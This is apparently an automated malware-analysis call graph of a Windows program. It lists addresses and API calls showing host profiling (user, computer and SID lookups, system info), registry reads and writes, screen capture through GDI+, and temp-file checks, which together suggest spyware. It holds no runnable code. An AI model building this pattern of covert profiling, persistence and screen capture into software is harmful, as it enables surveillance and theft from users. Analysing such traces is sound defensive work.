31481 ce4179 31478->31481 31500 ce3cc6 49 API calls 31479->31500 31481->31460 31501 cbc6d0 Sleep CreateMutexA GetLastError 31482->31501 31490 cd0c1f 31491 cd0bd0 CreateThread 31490->31491 31492 cd0bf0 Sleep 31491->31492 32431 cd0b40 31491->32431 31492->31492 31493->31456 31494->31450 31495->31451 31496->31454 31497->31473 31498->31475 31499->31476 31500->31481 31502 cbc71a 31501->31502 31503 cbc709 31501->31503 31508 cc1600 31502->31508 31503->31502 31504 cbc70d GetLastError 31503->31504 31504->31502 31505 cbc71c 31504->31505 31748 cdddae 23 API calls std::locale::_Setgloballocale 31505->31748 31507 cbc723 31509 cc1650 31508->31509 31515 cc166a 31508->31515 31756 cd3190 31509->31756 31512 cc1d25 31516 cc1e90 31512->31516 31513 cc165f 31772 cb61f0 31513->31772 31749 cd9810 31515->31749 31517 cc229a 31516->31517 31518 cc1ecb 31516->31518 31519 cd9810 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 31517->31519 31521 cd3190 70 API calls 31518->31521 31520 cc22b2 31519->31520 31578 ccf300 31520->31578 31522 cc1f15 31521->31522 31523 cb61f0 114 API calls 31522->31523 31524 cc1f20 31523->31524 31525 cc1f3f 31524->31525 31526 cc22b6 31524->31526 32073 cd5770 27 API calls 3 library calls 31525->32073 32086 cb26a0 27 API calls 31526->32086 31529 cc22bb 31531 cdee79 25 API calls 31529->31531 31530 cc1f6e 31532 cd5590 27 API calls 31530->31532 31533 cc22c0 31531->31533 31534 cc1f8b 31532->31534 32087 cde616 67 API calls 4 library calls 31533->32087 32074 cd30d0 31534->32074 31537 cc22c6 32088 cd3150 27 API calls 31537->32088 31539 cc22db 31540 cd3190 70 API calls 31539->31540 31542 cc22f6 31540->31542 31541 cc2053 GetModuleFileNameA 31543 cc2090 31541->31543 32089 cd3150 27 API calls 31542->32089 31543->31543 31547 cd40a0 27 API calls 31543->31547 31544 cc1f9d _AnonymousOriginator 31544->31529 31544->31541 31545 cc2049 _AnonymousOriginator 31544->31545 31545->31541 31551 cc20ac _AnonymousOriginator 31547->31551 31548 cc2309 32090 cdddae 23 API calls std::locale::_Setgloballocale 31548->32090 31549 cc2144 32079 cde030 28 API calls 31549->32079 31551->31549 31553 cc231c 31551->31553 31557 cc2215 _AnonymousOriginator 31551->31557 31555 cdee79 25 API calls 31553->31555 31554 cc215b 31554->31533 31556 cc2166 31554->31556 31559 cc2321 31555->31559 32080 cb9ed0 GetFileAttributesA 31556->32080 31557->31517 31557->31553 31558 cc2290 _AnonymousOriginator 31557->31558 31558->31517 31561 cc2171 31562 cc2189 31561->31562 31564 cc2182 CreateDirectoryA 31561->31564 32081 cb9ed0 GetFileAttributesA 31562->32081 31564->31562 31565 cc2194 31566 cc21c6 31565->31566 31568 cd3190 70 API calls 31565->31568 32084 cb9ea0 68 API calls 31566->32084 31570 cc21af 31568->31570 31569 cc21d4 31569->31548 32085 cd3150 27 API calls 31569->32085 32082 cba8c0 28 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 31570->32082 31572 cc21bd 32083 cc1080 28 API calls 2 library calls 31572->32083 31575 cc21f1 31576 cd3190 70 API calls 31575->31576 31577 cc220c 31576->31577 31577->31542 31579 ccf338 31578->31579 32091 cb78e0 31579->32091 31582 cd30d0 25 API calls 31583 ccf356 31582->31583 31584 ccf386 _AnonymousOriginator 31583->31584 31586 cd0b1a 31583->31586 32107 cb93d0 31584->32107 31589 cdee79 25 API calls 31586->31589 31591 cd0b33 31589->31591 31594 cb43e0 27 API calls 31595 ccf3bb RegOpenKeyExA RegCloseKey 31594->31595 31596 cb43e0 27 API calls 31595->31596 31597 ccf40b 31596->31597 31598 cd3190 70 API calls 31597->31598 31599 ccf429 31598->31599 31600 cb61f0 114 API calls 31599->31600 31601 ccf430 31600->31601 31602 cd3190 70 API calls 31601->31602 31603 ccf445 31602->31603 31604 cb61f0 114 API calls 31603->31604 31605 ccf44c 31604->31605 31606 ccf463 GetUserNameA 31605->31606 31607 ccf4b6 31606->31607 31607->31607 31608 cd40a0 27 API calls 31607->31608 31609 ccf4d2 31608->31609 32230 cbb250 GetComputerNameExW 31609->32230 31614 ccf533 31614->31614 31615 cd40a0 27 API calls 31614->31615 31616 ccf54b 31615->31616 32370 cb9e20 31616->32370 31619 cb43e0 27 API calls 31620 ccf56d 31619->31620 31621 cd3190 70 API calls 31620->31621 31622 ccf587 31621->31622 31623 cb61f0 114 API calls 31622->31623 31624 ccf592 31623->31624 31625 cb43e0 27 API calls 31624->31625 31626 ccf5a9 31625->31626 31627 cd3190 70 API calls 31626->31627 31628 ccf5bf 31627->31628 31629 cb61f0 114 API calls 31628->31629 31630 ccf5ca 31629->31630 31631 cd3190 70 API calls 31630->31631 31632 ccf5ed 31631->31632 31633 cb61f0 114 API calls 31632->31633 31634 ccf5f8 31633->31634 31635 cd3190 70 API calls 31634->31635 31636 ccf61b 31635->31636 31637 cb61f0 114 API calls 31636->31637 31638 ccf626 31637->31638 31639 cd3190 70 API calls 31638->31639 31640 ccf649 31639->31640 31641 cb61f0 114 API calls 31640->31641 31642 ccf654 31641->31642 31643 cd3190 70 API calls 31642->31643 31644 ccf677 31643->31644 31645 cb61f0 114 API calls 31644->31645 31646 ccf682 31645->31646 31647 cd3190 70 API calls 31646->31647 31648 ccf6a5 31647->31648 31649 cb61f0 114 API calls 31648->31649 31650 ccf6b0 31649->31650 31651 cd3190 70 API calls 31650->31651 31652 ccf6d3 31651->31652 31653 cb61f0 114 API calls 31652->31653 31654 ccf6de 31653->31654 31655 cd3190 70 API calls 31654->31655 31656 ccf701 31655->31656 31657 cb61f0 114 API calls 31656->31657 31658 ccf70c 31657->31658 31659 cd3190 70 API calls 31658->31659 31660 ccf72d 31659->31660 31661 cb61f0 114 API calls 31660->31661 31662 ccf738 31661->31662 31663 cd3190 70 API calls 31662->31663 31664 ccf74a 31663->31664 31665 cb61f0 114 API calls 31664->31665 31666 ccf755 31665->31666 31667 cd3190 70 API calls 31666->31667 31668 ccf767 31667->31668 31669 cb61f0 114 API calls 31668->31669 31670 ccf772 31669->31670 31671 cd3190 70 API calls 31670->31671 31672 ccf78f 31671->31672 31673 cb61f0 114 API calls 31672->31673 31674 ccf79a 31673->31674 32378 cd4740 31674->32378 31676 ccf7ae 31677 cd5590 27 API calls 31676->31677 31678 ccf7c8 31677->31678 31679 cd5590 27 API calls 31678->31679 31680 ccf7e5 31679->31680 31681 cd5590 27 API calls 31680->31681 31682 ccf802 31681->31682 31683 cd4740 27 API calls 31682->31683 31684 ccf817 31683->31684 31685 cd5590 27 API calls 31684->31685 31686 ccf836 31685->31686 31687 cd4740 27 API calls 31686->31687 31688 ccf84b 31687->31688 31689 cd5590 27 API calls 31688->31689 31690 ccf86a 31689->31690 31691 cd4740 27 API calls 31690->31691 31692 ccf87f 31691->31692 31693 cd5590 27 API calls 31692->31693 31694 ccf89e 31693->31694 31695 cd4740 27 API calls 31694->31695 31696 ccf8b3 31695->31696 31697 cd5590 27 API calls 31696->31697 31698 ccf8d2 31697->31698 31699 cd4740 27 API calls 31698->31699 31700 ccf8e7 31699->31700 31701 cd5590 27 API calls 31700->31701 31702 ccf906 31701->31702 31703 cd4740 27 API calls 31702->31703 31704 ccf91b 31703->31704 31705 cd5590 27 API calls 31704->31705 31706 ccf93a 31705->31706 31707 cd4740 27 API calls 31706->31707 31708 ccf94f 31707->31708 31709 cd5590 27 API calls 31708->31709 31710 ccf96e 31709->31710 31711 cd4740 27 API calls 31710->31711 31712 ccf983 31711->31712 31713 cd5590 27 API calls 31712->31713 31714 ccf9a2 31713->31714 31715 cd5590 27 API calls 31714->31715 31716 ccf9c4 31715->31716 31717 cd5590 27 API calls 31716->31717 31718 ccf9e6 31717->31718 31719 cd4740 27 API calls 31718->31719 31722 ccf9fb _AnonymousOriginator 31719->31722 31720 cd06f8 31724 cd3190 70 API calls 31720->31724 31721 cd0623 31723 cd3190 70 API calls 31721->31723 31722->31720 31722->31721 31725 cd0639 31723->31725 31726 cd070d 31724->31726 31727 cb61f0 114 API calls 31725->31727 31728 cd3190 70 API calls 31726->31728 31729 cd0644 31727->31729 31730 cd0722 31728->31730 31731 cd4740 27 API calls 31729->31731 32382 cb4d60 27 API calls _AnonymousOriginator 31730->32382 31733 cd0658 31731->31733 31735 cd30d0 25 API calls 31733->31735 31734 cd0731 32383 cbcb00 27 API calls 31734->32383 31745 cd0666 _AnonymousOriginator 31735->31745 31737 cd0742 31738 cd3190 70 API calls 31737->31738 31739 cd0757 31738->31739 31740 cb61f0 114 API calls 31739->31740 31741 cd0762 31740->31741 31742 cd5590 27 API calls 31741->31742 31743 cd077c 31742->31743 31744 cd30d0 25 API calls 31743->31744 31744->31745 31746 cd9810 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 31745->31746 31747 cd0b16 31746->31747 31747->31490 31748->31507 31750 cd9819 IsProcessorFeaturePresent 31749->31750 31751 cd9818 31749->31751 31753 cd9a45 31750->31753 31751->31512 31936 cd9a08 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 31753->31936 31755 cd9b28 31755->31512 31757 cd31bb 31756->31757 31758 cd31c2 31757->31758 31759 cd31f5 31757->31759 31760 cd3214 31757->31760 31758->31513 31761 cd31fc 31759->31761 31762 cd324a 31759->31762 31765 cd3209 _Yarn 31760->31765 31938 cb25c0 27 API calls 4 library calls 31760->31938 31937 cb25c0 27 API calls 4 library calls 31761->31937 31939 cb25c0 27 API calls 2 library calls 31762->31939 31765->31513 31767 cd3202 31767->31765 31940 cdee79 31767->31940 31769 cd3254 31945 cbddc0 68 API calls std::ios_base::_Ios_base_dtor 31769->31945 31771 cd326e _AnonymousOriginator 31771->31513 31957 cb5da0 31772->31957 31778 cb62e9 _AnonymousOriginator 31782 cd9810 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 31778->31782 31779 cb630f 31780 cdee79 25 API calls 31779->31780 31783 cb6314 __fread_nolock 31780->31783 31781 cb625f _AnonymousOriginator 31781->31778 31781->31779 31784 cb630b 31782->31784 31785 cb6377 RegOpenKeyExA 31783->31785 31784->31515 31786 cb63d0 RegCloseKey 31785->31786 31787 cb63a6 RegQueryValueExA 31785->31787 31788 cb6400 31786->31788 31787->31786 31788->31788 31972 cd40a0 31788->31972 31790 cb6480 _AnonymousOriginator 31792 cd9810 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 31790->31792 31791 cb6418 _AnonymousOriginator 31791->31790 31793 cb64a7 31791->31793 31794 cb64a3 31792->31794 31795 cdee79 25 API calls 31793->31795 31794->31515 31796 cb64ac RegOpenKeyExA 31795->31796 31798 cb64ed RegSetValueExA 31796->31798 31799 cb6517 RegCloseKey 31796->31799 31798->31799 31801 cb6528 _AnonymousOriginator 31799->31801 31800 cb65e6 31803 cdee79 25 API calls 31800->31803 31801->31800 31804 cb65ce _AnonymousOriginator 31801->31804 31802 cd9810 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 31805 cb65e2 31802->31805 31806 cb65eb 31803->31806 31804->31802 31805->31515 31987 ce19e7 31806->31987 31809 cb6646 RegSetValueExA 31810 cb6665 RegCloseKey 31809->31810 31811 cb6676 _AnonymousOriginator 31810->31811 31812 cb671c _AnonymousOriginator 31811->31812 31813 cb6734 31811->31813 31814 cd9810 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 31812->31814 31815 cdee79 25 API calls 31813->31815 31816 cb6730 31814->31816 31817 cb6739 __wsopen_s 31815->31817 31816->31515 31818 cd3190 70 API calls 31817->31818 31819 cb67a0 31818->31819 31820 cb61f0 74 API calls 31819->31820 31821 cb67ab RegOpenKeyExA 31820->31821 31823 cb67d9 __fread_nolock _AnonymousOriginator 31821->31823 31824 cb6d64 31823->31824 31826 cb6d80 31823->31826 31827 cb6829 RegQueryInfoKeyW 31823->31827 31825 cd9810 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 31824->31825 31828 cb6d7c 31825->31828 31829 cdee79 25 API calls 31826->31829 31830 cb6d58 RegCloseKey 31827->31830 31886 cb68a8 _AnonymousOriginator 31827->31886 31828->31515 31831 cb6d85 GdiplusStartup 31829->31831 31830->31824 31833 cb6e39 31831->31833 31837 cb6e13 GetDC 31831->31837 31832 cb68b2 RegEnumValueA 31832->31886 31834 cb6e45 31833->31834 31835 cb7534 31833->31835 31991 cd5530 27 API calls std::_Facet_Register 31834->31991 32011 cb26a0 27 API calls 31835->32011 31844 cd3190 70 API calls 31837->31844 31838 cb7539 31841 cdee79 25 API calls 31838->31841 31840 cd40a0 27 API calls 31840->31886 31843 cb7552 GetUserNameA LookupAccountNameA GetSidIdentifierAuthority 31841->31843 31848 cd3190 70 API calls 31843->31848 31846 cb6f8b 31844->31846 31847 cb61f0 74 API calls 31846->31847 31849 cb6f96 31847->31849 31850 cb7626 31848->31850 31851 cd3190 70 API calls 31849->31851 31852 cb61f0 74 API calls 31850->31852 31853 cb6fb3 31851->31853 31854 cb7631 31852->31854 31855 cb61f0 74 API calls 31853->31855 32012 cb2400 44 API calls 31854->32012 31857 cb6fba 31855->31857 31858 cd3190 70 API calls 31857->31858 31860 cb6fcf 31858->31860 31859 cd3190 70 API calls 31859->31886 31861 cb61f0 74 API calls 31860->31861 31864 cb6fd6 31861->31864 31862 cb78c3 31865 cdee79 25 API calls 31862->31865 31863 cb7649 _AnonymousOriginator 31863->31862 31866 cd3190 70 API calls 31863->31866 31869 cd3190 70 API calls 31864->31869 31867 cb78c8 31865->31867 31868 cb76b2 31866->31868 31870 cdee79 25 API calls 31867->31870 31871 cb61f0 74 API calls 31868->31871 31872 cb7002 31869->31872 31873 cb78cd 31870->31873 31874 cb76bd 31871->31874 31875 cb61f0 74 API calls 31872->31875 31876 cdee79 25 API calls 31873->31876 32013 cb2400 44 API calls 31874->32013 31879 cb700d 31875->31879 31877 cb78d2 31876->31877 31992 cd5590 31879->31992 31881 cb7024 31883 cd5590 27 API calls 31881->31883 31882 cb771a GetSidSubAuthorityCount 31884 cb7734 _AnonymousOriginator 31882->31884 31888 cb77d2 31882->31888 31889 cb703b _AnonymousOriginator 31883->31889 31884->31862 31887 cb7740 GetSidSubAuthority 31884->31887 31884->31888 31893 cb61f0 74 API calls 31884->31893 32014 cb2400 44 API calls 31884->32014 31885 cb76d7 _AnonymousOriginator 31885->31867 31885->31882 31886->31826 31886->31830 31886->31832 31886->31840 31886->31859 31899 cb61f0 74 API calls 31886->31899 31890 cd3190 70 API calls 31887->31890 31891 cd40a0 27 API calls 31888->31891 31889->31838 31895 cb715f _AnonymousOriginator 31889->31895 31890->31884 31892 cb7822 31891->31892 31894 cd40a0 27 API calls 31892->31894 31893->31884 31897 cb786f 31894->31897 31896 cd3190 70 API calls 31895->31896 31900 cb719f 31896->31900 31897->31873 31901 cb789b _AnonymousOriginator 31897->31901 31899->31886 31902 cb61f0 74 API calls 31900->31902 31903 cd9810 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 31901->31903 31904 cb71aa 31902->31904 31905 cb78bf 31903->31905 31906 cb71b3 31904->31906 31907 cb71b5 RegGetValueA 31904->31907 31905->31515 31906->31907 31908 cb71e5 _AnonymousOriginator 31907->31908 31909 cb722f GetSystemMetrics 31908->31909 31910 cb7226 GetSystemMetrics 31908->31910 31912 cb7234 31909->31912 31911 cb722d 31910->31911 31910->31912 31911->31909 31913 cd3190 70 API calls 31912->31913 31914 cb724f 31913->31914 31915 cb61f0 74 API calls 31914->31915 31916 cb725a RegGetValueA 31915->31916 31922 cb728f _AnonymousOriginator 31916->31922 31918 cb72ca GetSystemMetrics 31920 cb72d8 6 API calls 31918->31920 31921 cb72d1 31918->31921 31919 cb72d3 GetSystemMetrics 31919->31920 31923 cb736b 31920->31923 31924 cb73f8 6 API calls 31920->31924 31921->31919 31922->31918 31922->31919 32009 ce24e9 15 API calls 2 library calls 31923->32009 31926 cb744f _AnonymousOriginator 31924->31926 31927 cb74e0 GdiplusShutdown 31926->31927 31930 cb74f1 _AnonymousOriginator 31927->31930 31928 cb7371 31928->31924 31929 cb7380 GdipGetImageEncoders 31928->31929 31935 cb7394 31929->31935 31931 cd9810 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 31930->31931 31932 cb7530 31931->31932 31932->31515 31934 cb73ef 31934->31924 32010 ce1ca1 14 API calls _free 31935->32010 31936->31755 31937->31767 31938->31765 31939->31767 31946 cdee05 25 API calls 3 library calls 31940->31946 31943 cffeb0 _AnonymousOriginator 31943->31769 31944 cdee88 31944->31940 31944->31943 31947 cdee96 IsProcessorFeaturePresent 31944->31947 31945->31771 31946->31944 31948 cdeea2 31947->31948 31951 cdecbd 31948->31951 31952 cdecd9 __fread_nolock std::locale::_Setgloballocale 31951->31952 31953 cded05 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 31952->31953 31954 cdedd6 std::locale::_Setgloballocale 31953->31954 31955 cd9810 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 31954->31955 31956 cdedf4 GetCurrentProcess TerminateProcess 31955->31956 31956->31944 32015 cd3f60 27 API calls 3 library calls 31957->32015 31959 cb5dd1 31960 cb6060 31959->31960 32016 cd3f60 27 API calls 3 library calls 31960->32016 31962 cb61c6 31965 cb51a0 31962->31965 31964 cb6095 31964->31962 32017 ce0210 40 API calls __Getctype 31964->32017 31966 cb5432 31965->31966 31970 cb5204 31965->31970 31966->31781 31968 cb5355 31968->31966 32020 cd5070 27 API calls 3 library calls 31968->32020 31970->31968 32018 ce0210 40 API calls __Getctype 31970->32018 32019 cd5070 27 API calls 3 library calls 31970->32019 31975 cd40be _Yarn 31972->31975 31977 cd40e4 31972->31977 31973 cd41ce 32023 cb26a0 27 API calls 31973->32023 31975->31791 31976 cd41d3 32024 cb25c0 27 API calls 2 library calls 31976->32024 31977->31973 31978 cd415d 31977->31978 31979 cd4138 31977->31979 31983 cd4149 _Yarn 31978->31983 32022 cb25c0 27 API calls 4 library calls 31978->32022 31979->31976 32021 cb25c0 27 API calls 4 library calls 31979->32021 31985 cdee79 25 API calls 31983->31985 31986 cd41b0 _AnonymousOriginator 31983->31986 31984 cd41d8 _AnonymousOriginator 31984->31791 31985->31973 31986->31791 31988 ce1a02 31987->31988 32025 ce1111 31988->32025 31991->31837 31993 cd55d3 31992->31993 31994 cd5760 31993->31994 31995 cd56a0 31993->31995 31999 cd55d8 _Yarn 31993->31999 32071 cb26a0 27 API calls 31994->32071 31998 cd56d5 31995->31998 32002 cd56fb 31995->32002 31997 cd5765 32072 cb25c0 27 API calls 2 library calls 31997->32072 31998->31997 32001 cd56e0 31998->32001 31999->31881 32069 cb25c0 27 API calls 4 library calls 32001->32069 32008 cd56ed _Yarn 32002->32008 32070 cb25c0 27 API calls 4 library calls 32002->32070 32003 cd56e6 32006 cdee79 25 API calls 32003->32006 32003->32008 32007 cd576f 32006->32007 32008->31881 32009->31928 32010->31934 32012->31863 32013->31885 32014->31884 32015->31959 32016->31964 32017->31964 32018->31970 32019->31970 32020->31968 32021->31983 32022->31983 32024->31984 32043 cdff97 32025->32043 32027 ce115c 32052 cde047 32027->32052 32029 ce1138 32050 ce10b2 14 API calls __dosmaperr 32029->32050 32030 ce1123 32030->32027 32030->32029 32042 cb661c RegOpenKeyExA 32030->32042 32032 ce113d 32051 cdee69 25 API calls __cftoe 32032->32051 32035 ce1168 32036 ce1197 32035->32036 32060 ce1993 40 API calls 2 library calls 32035->32060 32039 ce1201 32036->32039 32061 ce193c 25 API calls 2 library calls 32036->32061 32062 ce193c 25 API calls 2 library calls 32039->32062 32040 ce12c7 32040->32042 32063 ce10b2 14 API calls __dosmaperr 32040->32063 32042->31809 32042->31810 32044 cdff9c 32043->32044 32045 cdffaf 32043->32045 32064 ce10b2 14 API calls __dosmaperr 32044->32064 32045->32030 32047 cdffa1 32065 cdee69 25 API calls __cftoe 32047->32065 32049 cdffac 32049->32030 32050->32032 32051->32042 32053 cde067 32052->32053 32059 cde05e 32052->32059 32053->32059 32066 ce6c20 37 API calls 3 library calls 32053->32066 32055 cde087 32067 ce7446 37 API calls __Getctype 32055->32067 32057 cde09d 32068 ce7473 37 API calls __cftoe 32057->32068 32059->32035 32060->32035 32061->32039 32062->32040 32063->32042 32064->32047 32065->32049 32066->32055 32067->32057 32068->32059 32069->32003 32070->32008 32072->32003 32073->31530 32075 cd3101 _AnonymousOriginator 32074->32075 32076 cd30de 32074->32076 32075->31544 32076->32075 32077 cdee79 25 API calls 32076->32077 32078 cd314c 32077->32078 32079->31554 32080->31561 32081->31565 32082->31572 32083->31566 32084->31569 32085->31575 32087->31537 32088->31539 32089->31548 32090->31553 32092 cb7c4a 32091->32092 32106 cb795f _AnonymousOriginator 32091->32106 32093 cb7c73 32092->32093 32094 cb7d12 32092->32094 32095 cd40a0 27 API calls 32093->32095 32385 cd45b0 27 API calls 32094->32385 32102 cb7c92 _AnonymousOriginator 32095->32102 32097 cb7d17 32099 cdee79 25 API calls 32097->32099 32098 cd40a0 27 API calls 32098->32106 32100 cb7d1c 32099->32100 32101 cb7ce8 _AnonymousOriginator 32103 cd9810 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 32101->32103 32102->32097 32102->32101 32104 cb7d0b 32103->32104 32104->31582 32106->32092 32106->32094 32106->32097 32106->32098 32384 cd58f0 27 API calls _Yarn 32106->32384 32386 cdb4a0 32107->32386 32110 cb9458 32112 cd3190 70 API calls 32110->32112 32111 cd9810 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 32113 cb9a0d 32111->32113 32114 cb9467 32112->32114 32201 cb43e0 32113->32201 32115 cb61f0 114 API calls 32114->32115 32116 cb9472 32115->32116 32117 cd3190 70 API calls 32116->32117 32118 cb9494 32117->32118 32119 cb61f0 114 API calls 32118->32119 32120 cb949f GetModuleHandleA GetProcAddress 32119->32120 32122 cb94c5 _AnonymousOriginator 32120->32122 32125 cb9a14 32122->32125 32126 cb9546 _AnonymousOriginator 32122->32126 32123 cb9573 GetNativeSystemInfo 32130 cb957d 32123->32130 32124 cb9577 GetSystemInfo 32124->32130 32127 cdee79 25 API calls 32125->32127 32126->32123 32126->32124 32128 cb9a19 32127->32128 32129 cdee79 25 API calls 32128->32129 32131 cb9a1e 32129->32131 32132 cb96b9 32130->32132 32133 cb95df 32130->32133 32155 cb9588 _AnonymousOriginator 32130->32155 32135 cd3190 70 API calls 32132->32135 32134 cd3190 70 API calls 32133->32134 32136 cb9600 32134->32136 32137 cb96e5 32135->32137 32138 cb61f0 114 API calls 32136->32138 32139 cb61f0 114 API calls 32137->32139 32140 cb9607 32138->32140 32141 cb96ec 32139->32141 32142 cd3190 70 API calls 32140->32142 32143 cd3190 70 API calls 32141->32143 32144 cb961f 32142->32144 32145 cb9704 32143->32145 32147 cb61f0 114 API calls 32144->32147 32146 cb61f0 114 API calls 32145->32146 32148 cb970b 32146->32148 32150 cb9626 32147->32150 32149 cd3190 70 API calls 32148->32149 32152 cb973c 32149->32152 32388 ce1cdf 40 API calls 32150->32388 32154 cb61f0 114 API calls 32152->32154 32153 cb9651 32153->32128 32153->32155 32156 cb9743 32154->32156 32155->32111 32389 cb91b0 119 API calls 3 library calls 32156->32389 32158 cb9752 32159 cd3190 70 API calls 32158->32159 32160 cb978d 32159->32160 32161 cb61f0 114 API calls 32160->32161 32162 cb9794 32161->32162 32163 cd3190 70 API calls 32162->32163 32164 cb97ac 32163->32164 32165 cb61f0 114 API calls 32164->32165 32166 cb97b3 32165->32166 32167 cd3190 70 API calls 32166->32167 32168 cb97e4 32167->32168 32169 cb61f0 114 API calls 32168->32169 32170 cb97eb 32169->32170 32390 cb91b0 119 API calls 3 library calls 32170->32390 32172 cb97fa 32173 cd3190 70 API calls 32172->32173 32174 cb9835 32173->32174 32175 cb61f0 114 API calls 32174->32175 32176 cb983c 32175->32176 32177 cd3190 70 API calls 32176->32177 32178 cb9854 32177->32178 32179 cb61f0 114 API calls 32178->32179 32180 cb985b 32179->32180 32181 cd3190 70 API calls 32180->32181 32182 cb988c 32181->32182 32183 cb61f0 114 API calls 32182->32183 32184 cb9893 32183->32184 32391 cb91b0 119 API calls 3 library calls 32184->32391 32186 cb98a2 32187 cd3190 70 API calls 32186->32187 32188 cb98dd 32187->32188 32189 cb61f0 114 API calls 32188->32189 32190 cb98e4 32189->32190 32191 cd3190 70 API calls 32190->32191 32192 cb98fc 32191->32192 32193 cb61f0 114 API calls 32192->32193 32194 cb9903 32193->32194 32195 cd3190 70 API calls 32194->32195 32196 cb9934 32195->32196 32197 cb61f0 114 API calls 32196->32197 32198 cb993b 32197->32198 32392 cb91b0 119 API calls 3 library calls 32198->32392 32200 cb994a 32200->32155 32202 cb4404 32201->32202 32203 cb447d 32202->32203 32204 cd40a0 27 API calls 32202->32204 32205 cd9810 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 32203->32205 32204->32203 32206 cb448c 32205->32206 32207 cb9a20 32206->32207 32208 cdb4a0 __fread_nolock 32207->32208 32209 cb9a85 GetVersionExW 32208->32209 32210 cb9aad 32209->32210 32229 cb9aa3 32209->32229 32211 cd3190 70 API calls 32210->32211 32212 cb9abc 32211->32212 32214 cb61f0 114 API calls 32212->32214 32213 cd9810 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 32215 cb9c05 32213->32215 32216 cb9ac7 32214->32216 32215->31594 32217 cd3190 70 API calls 32216->32217 32218 cb9ae9 32217->32218 32219 cb61f0 114 API calls 32218->32219 32220 cb9af4 GetModuleHandleA GetProcAddress 32219->32220 32222 cb9b1a _AnonymousOriginator 32220->32222 32223 cb9b97 _AnonymousOriginator 32222->32223 32226 cb9c0c 32222->32226 32224 cb9bc8 GetSystemInfo 32223->32224 32225 cb9bc4 GetNativeSystemInfo 32223->32225 32224->32229 32225->32229 32227 cdee79 25 API calls 32226->32227 32228 cb9c11 32227->32228 32229->32213 32231 cbb2e0 32230->32231 32231->32231 32232 cbb4ab 32231->32232 32233 cbb331 32231->32233 32240 cbb2f4 _Yarn 32231->32240 32408 cb26a0 27 API calls 32232->32408 32407 cd5530 27 API calls std::_Facet_Register 32233->32407 32235 cbb4b0 32237 cdee79 25 API calls 32235->32237 32239 cbb4b5 32237->32239 32393 cd2e60 32240->32393 32241 cbb483 _AnonymousOriginator 32242 cd9810 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 32241->32242 32244 cbb4a7 32242->32244 32243 cbb3e7 32243->32235 32243->32241 32245 cbb700 32244->32245 32246 cd3190 70 API calls 32245->32246 32247 cbb742 32246->32247 32248 cb61f0 114 API calls 32247->32248 32249 cbb74a 32248->32249 32413 cba270 GetTempPathA 32249->32413 32252 cd5590 27 API calls 32253 cbb76f GetFileAttributesA 32252->32253 32257 cbb788 _AnonymousOriginator 32253->32257 32254 cbb853 _AnonymousOriginator 32259 cd3190 70 API calls 32254->32259 32369 cbb861 32254->32369 32255 cbc689 32256 cdee79 25 API calls 32255->32256 32258 cbc6c5 32256->32258 32257->32254 32257->32255 32261 cbb87c 32259->32261 32260 cd40a0 27 API calls 32262 cbc675 GetModuleFileNameA 32260->32262 32263 cb61f0 114 API calls 32261->32263 32262->31614 32264 cbb884 32263->32264 32265 cba270 115 API calls 32264->32265 32266 cbb898 32265->32266 32267 cd5590 27 API calls 32266->32267 32268 cbb8a9 GetFileAttributesA 32267->32268 32269 cbb8c2 _AnonymousOriginator 32268->32269 32270 cd3190 70 API calls 32269->32270 32269->32369 32271 cbb9b6 32270->32271 32272 cb61f0 114 API calls 32271->32272 32273 cbb9be 32272->32273 32274 cba270 115 API calls 32273->32274 32275 cbb9d2 32274->32275 32276 cd5590 27 API calls 32275->32276 32277 cbb9e3 GetFileAttributesA 32276->32277 32278 cbb9fc _AnonymousOriginator 32277->32278 32279 cd3190 70 API calls 32278->32279 32278->32369 32280 cbbaf0 32279->32280 32281 cb61f0 114 API calls 32280->32281 32282 cbbaf8 32281->32282 32283 cba270 115 API calls 32282->32283 32284 cbbb0c 32283->32284 32285 cd5590 27 API calls 32284->32285 32286 cbbb1d GetFileAttributesA 32285->32286 32287 cbbb36 _AnonymousOriginator 32286->32287 32288 cd3190 70 API calls 32287->32288 32287->32369 32289 cbbc2a 32288->32289 32290 cb61f0 114 API calls 32289->32290 32291 cbbc32 32290->32291 32292 cba270 115 API calls 32291->32292 32293 cbbc46 32292->32293 32294 cd5590 27 API calls 32293->32294 32295 cbbc57 GetFileAttributesA 32294->32295 32296 cbbc70 _AnonymousOriginator 32295->32296 32297 cd3190 70 API calls 32296->32297 32296->32369 32298 cbbd64 32297->32298 32299 cb61f0 114 API calls 32298->32299 32300 cbbd6c 32299->32300 32301 cba270 115 API calls 32300->32301 32302 cbbd80 32301->32302 32303 cd5590 27 API calls 32302->32303 32304 cbbd91 GetFileAttributesA 32303->32304 32305 cbbdaa _AnonymousOriginator 32304->32305 32306 cd3190 70 API calls 32305->32306 32305->32369 32307 cbbe9e 32306->32307 32308 cb61f0 114 API calls 32307->32308 32309 cbbea6 32308->32309 32310 cba270 115 API calls 32309->32310 32311 cbbeba 32310->32311 32312 cd5590 27 API calls 32311->32312 32313 cbbecb GetFileAttributesA 32312->32313 32315 cbbee4 _AnonymousOriginator 32313->32315 32314 cd3190 70 API calls 32316 cbbfd8 32314->32316 32315->32314 32315->32369 32317 cb61f0 114 API calls 32316->32317 32318 cbbfe0 32317->32318 32319 cba270 115 API calls 32318->32319 32320 cbbff4 32319->32320 32321 cd5590 27 API calls 32320->32321 32322 cbc005 GetFileAttributesA 32321->32322 